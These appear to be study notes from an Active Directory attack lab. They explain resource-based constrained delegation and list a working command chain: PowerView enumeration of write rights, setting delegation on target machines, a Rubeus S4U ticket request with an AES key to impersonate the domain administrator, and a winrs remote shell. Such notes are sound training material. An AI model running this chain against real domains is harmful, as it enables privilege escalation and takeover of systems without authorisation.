- This moves delegation authority to the resource/service administrator.
- Instead of SPNs on msDs-AllowedToDelegatTo on the front-end service like web service, access in this case is controlled by security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service like SQL Server service.
- That is, the resource/service administrator can configure this delegation whereas for other types, SeEnableDelegation privileges are required which are, by default, available only to Domain Admins.
- To abuse RBCD in the most effective form, we just need two privileges.
- One, control over an object which has SPN configured (like admin access to a domain joined machine or ability to join a machine to domain - ms-DSMachineAccountQuota is 10 for all domain users)
- Two, Write permissions over the target service or object to configure msDSAllowedToActOnBehalfOfOtherIdentity.
- We already have admin privileges on student VMs that are domain joined machines.
- Enumeration would show that the user 'ciadmin' has Write permissions over the dcorp-mgmt machine!
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
Get-DomainRBCD
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std418' -Verbose
$comps = 'student1$','student47$'

Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps

Rubeus.exe s4u /user:student47$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d 83b9e6b7fc7897c2 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt

winrs -r:us-helpdesk cmd